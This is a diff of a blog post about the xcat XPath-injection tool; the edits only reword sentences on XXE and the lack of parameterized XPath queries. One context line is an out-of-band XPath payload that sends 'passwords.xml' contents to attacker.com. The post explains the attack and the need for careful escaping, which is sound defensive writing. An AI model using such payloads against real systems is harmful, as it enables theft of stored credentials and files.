orf/blog-hugo/content/blog/xcat-1.0/index.md

 `doc(string-join('http://attacker.com/?d', encode-for-uri(doc('passwords.xml')/some-node)))`

-Another interesting problem is [external entity injection](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).
+Another cool issue is [external entity injection](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).
 The tl;dr is you can serve up a malicious XML file that is requested by `doc()` that can read arbitrary files on the filesystem!

-Awesome! [xcat implements this attack](https://xcat.readthedocs.io/en/latest/OOB-server/) by the way.
+Awesome! [xcat implements these attacks](https://xcat.readthedocs.io/en/latest/OOB-server/) by the way.

 The kicker here is:

 - You need to explicitly configure your XPath engine to protect against all of this, which inevitably nobody does because nobody expects it.
 It's just a simple query language, right?

-- There is no concept of parameterized queries like you have in SQL.
-If you don't properly escape **every** input you're putting into an XPath query then you're vulnerable to all of this!
+- There is no concept of parameterized queries like you have in every SQL adapter ever.
+It has to be done manually, and it has to be done **correctly in every input**.
+If you miss something then you're vulnerable to all of this!

 And this was XPath 2.0.
 Tom got to go to Amsterdam and [present at Black Hat Europe](https://media.blackhat.com/bh-eu-12/Siddharth/bh-eu-12-Siddharth-Xpath-Slides.pdf), and